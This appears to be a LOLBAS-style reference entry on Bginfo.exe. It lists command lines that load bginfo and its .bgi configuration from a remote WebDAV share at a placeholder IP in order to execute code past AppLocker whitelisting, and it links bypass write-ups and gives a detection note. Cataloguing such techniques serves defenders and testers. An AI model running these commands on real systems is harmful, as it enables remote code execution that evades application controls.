38 lines
999 B
Markdown
38 lines
999 B
Markdown
## Bginfo.exe
|
|
|
|
* Functions: Execute
|
|
|
|
```
|
|
bginfo.exe bginfo.bgi /popup /nolicprompt
|
|
|
|
"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
|
|
|
|
"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
|
```
|
|
|
|
Acknowledgements:
|
|
* Oddvar Moe - @oddvarmoe
|
|
|
|
Code sample:
|
|
* https://github.com/api0cradle/BGInfo/blob/master/BGITool_1.0.ps1
|
|
|
|
Resources:
|
|
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
|
|
* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
|
|
* https://twitter.com/Oddvarmoe/status/865330067630694400
|
|
* https://twitter.com/ItsReallyNick/status/996133093613424641
|
|
* https://github.com/3gstudent/bgi-creater
|
|
* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
|
|
|
|
Full path:
|
|
```
|
|
No fixed path
|
|
```
|
|
|
|
Notes:
|
|
Used to set background image in Windows with details about the environment
|
|
|
|
|
|
Detection:
|
|
Bginfo.exe requesting files externally or running VBS scripts.
|